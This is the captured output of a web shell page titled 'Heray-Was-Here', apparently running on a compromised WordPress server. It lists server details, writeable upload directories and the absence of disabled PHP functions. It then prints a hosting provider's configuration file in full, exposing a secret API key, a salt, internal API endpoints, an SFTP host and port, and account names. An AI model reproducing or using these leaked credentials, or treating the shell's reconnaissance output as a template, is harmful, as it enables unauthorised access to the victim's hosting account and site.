Heray-Was-Here
Server : Apache
System : Linux ip-172-26-6-158 5.10.0-35-cloud-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User : daemon ( 1)
PHP Version : 8.1.10
Disable Function : NONE
Directory :  /opt/bitnami/wordpress/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/bitnami/wordpress/wp-config-pressidium.php
<?php
/***************************************/
/***************************************/
/*    THIS IS AN AUTOGENERATED FILE    */
/*        DO NOT EDIT THIS FILE        */
/*   YOUR CHANGES WILL NOT BE SAVED    */
/***************************************/
/***************************************/

/**
    Please, contact Pressidium's support department, if you need to make
    changes to the settings in this file.

    Config file belongs to avenuewestglo of account u399 on the production environment
    Script generated on Mon Mar 22 19:47:03 2021
*/

$redis_server=array('host' => '127.0.0.1', 'port' => 22129);



/* cache settings, user can edit them using https://cp.pressidium.com/ */
/* production cache settings */
$pressidium_cache_level = "A";
$pressidium_plugins_exclude_from_cache = array();
$pressidium_exclude_from_cache=array();
$pressidium_custom_rewrites=array();
$pressidium_custom_ttl_for_urls=array();
/* these values can/will be overwritten by the ones defined in wp-config.php */
// debug options
if ( !defined('WP_DEBUG') ) {
    define('WP_DEBUG', false);
}
if ( !defined('WP_DEBUG_LOG') ) {
    define( 'WP_DEBUG_LOG', false );
}
if ( !defined('WP_DEBUG_DISPLAY') ) {
    define( 'WP_DEBUG_DISPLAY', false);
}
// editor
if ( !defined('DISALLOW_FILE_EDIT') ) {
    define('DISALLOW_FILE_EDIT', true);
}

/* these values are not meant to be changed by the user */

define( 'WP_NINUKIS_IP', 'c17.cluster.pressidium.com' );
define( 'WP_NINUKIS_WP_NAME', 'avenuewestglo' );
define( 'WP_NINUKIS_ACCOUNT', 'u399' );
define( 'WP_NINUKIS_HOME', '/wp-storage/c17' );
define( 'WP_NINUKIS_CLUSTER', 'c17' );
define( 'WP_NINUKIS_REGION', 'us-east-1' );
define( 'WP_NINUKIS_PUBLIC_API_KEY', 'd2f5591340dc7b9283472100c01baeb3' );
define( 'WP_NINUKIS_SECRET_API_KEY', 'JDUkcm91bmRzPTUzNTAwMCQuUGRZSm0vdEI4a1g4OGo2JFh3NVI1SG9UY00zWWF1aFpwM241MG5jQU1JR0tZM1Jadjd3UnpxQjZvQjM' );
define( 'WP_NINUKIS_API_URL', 'http://c2-api.pressidium.com/restricted/api/v1.0' );
define( 'WP_NINUKIS_SMACKER_BASE', 'http://c2-smacker.pressidium.com/index.php?file=' );
define( 'WP_NINUKIS_SALT', 'gDu50t0' );
define( 'WP_NINUKIS_SFTP_HOST', 'sftp.avenuewestglo.onpressidium.com' );
define( 'WP_NINUKIS_SFTP_PORT', '11517' );
define( 'PRESSIDIUM_INJECT_RID', true );
define( 'PRESSIDIUM_FORCE_LOGIN_PROTECTION', true );
define( 'PRESSIDIUM_FORCE_STRONG_PASSWORDS', true );
define( 'PRESSIDIUM_IS_STAGING', false );
define( 'PRESSIDIUM_DISABLE_MENU', false );
define( 'PRESSIDIUM_REMOVE_DASHBOARD_PHP_NAG', true );
define( 'WP_AUTO_UPDATE_CORE', false );
define( 'FS_METHOD', 'direct' );
define( 'FS_CHMOD_DIR', 0775 );
define( 'FS_CHMOD_FILE', 0664 );
define( 'WP_POST_REVISIONS',5 );
define( 'EMPTY_TRASH_DAYS', 7 );
define( 'AUTOSAVE_INTERVAL', 180 ); // Seconds
define( 'DISABLE_WP_CRON', true );
define( 'WP_MEMORY_LIMIT', '256M' );
define( 'WP_MAX_MEMORY_LIMIT', '256M' );
define( 'WP_ENVIRONMENT_TYPE', 'production' );

Hry